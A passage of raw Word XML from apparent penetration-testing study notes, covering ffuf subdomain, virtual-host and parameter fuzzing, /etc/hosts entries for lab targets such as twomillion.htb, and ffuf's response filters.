          <w:numId w:val="256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOWEVER, once you find the subdomain and add it to /etc/hosts, you need to know the correct domain. Like you can't append the wrong domain to the subdomain in /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001191">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001192">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yhl5szp89ese" w:id="145"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For virtual hosting (which is most cases, cuz we have a target IP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001193">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId348">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny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194">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -H "Host: FUZZ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" -H "User-Agent: PENTEST" -c -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt"-u http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001195">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlyrands.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001196">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And keep PENTEST since it's just random value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001197">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001198">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001199">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Host: FUZZ.example.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Host: FUZZ.example.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Different wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You NEED to include the Host and include the FUZZ keyword there instead of the URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000119F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a subdomain, to access it, add it to /etc/hosts, so that the original IP points to both the main domain (virtual host) and the main domain with the subdomain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nano /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 sub.example.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5337203" cy="3713987"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="196" name="image202.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image202.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId349"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5337203" cy="3713987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL path enumeration on subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a subdomain and add it to /etc/hosts, then you can do normal URL path enumeration without specifying host, and just do it like normal but instead of example.com for the -u, you just do sub.example.com, where sub is the subdomain name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You also need to FIRST add "[IP] [domain]" to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nano /etc/hosts, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then add something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">twomillion.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow redirects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag anywhere in the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011AF">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter fuzzing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u "http://example.com/page?FUZZ=value" -w /path/to/parameters.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering by number of words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -w /path/to/wordlists.txt -fw 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, we get false positives, with something like 1 word, so we can use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag to filter OUT all the responses with 1 word. We can also change the number 1 to any</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important filters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out status code:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fc 404,200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by status code: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-mc 200,403</w:t>
      </w:r>
